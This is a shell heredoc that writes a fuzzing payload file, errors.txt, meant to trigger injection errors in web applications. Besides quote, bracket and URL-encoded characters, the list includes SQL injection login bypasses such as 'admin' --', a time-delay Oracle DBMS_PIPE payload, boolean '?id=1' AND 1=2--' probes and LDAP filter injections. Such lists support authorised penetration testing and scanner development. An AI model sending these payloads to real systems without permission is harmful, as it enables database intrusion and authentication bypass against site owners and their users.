cat << 'EOF' > payloads/errors.txt
'
"
"'
' "
'"
'''
.
/
\
%5c
%27
%22
%23
%3B
%27%22%60
%22%27
%27%20%22
%27%22
%27%27%27
)
")
')
))
"))
'))
)))
#
;
''
`
``
,
""
//
\\
%
%00
||
%2F
%5C
%29
%22%29
%27%29
%29%29
%22%29%29
%27%29%29
%27%27
%60
%60%60
%2C
%22%22
%2F%2F
%5C%5C
%7C%7C
28 %
%2A%7C
//*
%7C
29 %
(
*/*
|
%'
%"
*
*)(&
*)(|(&
*)(|(*
*))%00
-'
/1#\
'-'
' '
'&'
'^'
'*'
"-"
" "
"&"
"^"
"*"
admin' --
admin' #
admin'/*
admin" --
admin" #
admin"/*
/1#\
or isNULL(1/0) /*
" or isNULL(1/0) /*
-6513%27%20OR%20%28SELECT%20INSTR2%28NULL%2CNULL%29%20FROM%20DUAL%29%20IS%20NULL--%20SpSw
1%00%C0%A7%C0%A2%252527%252522
gGBw={vsCx}&firc=<
c4aQYcql
%40%40KFdwo
u]H[ww6KrA9F.x-F'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C'
%40%408orwa
orwa'"
20PVEY5L
?id=1' AND 1=2--
?dir=1' AND 1=2--
EOF
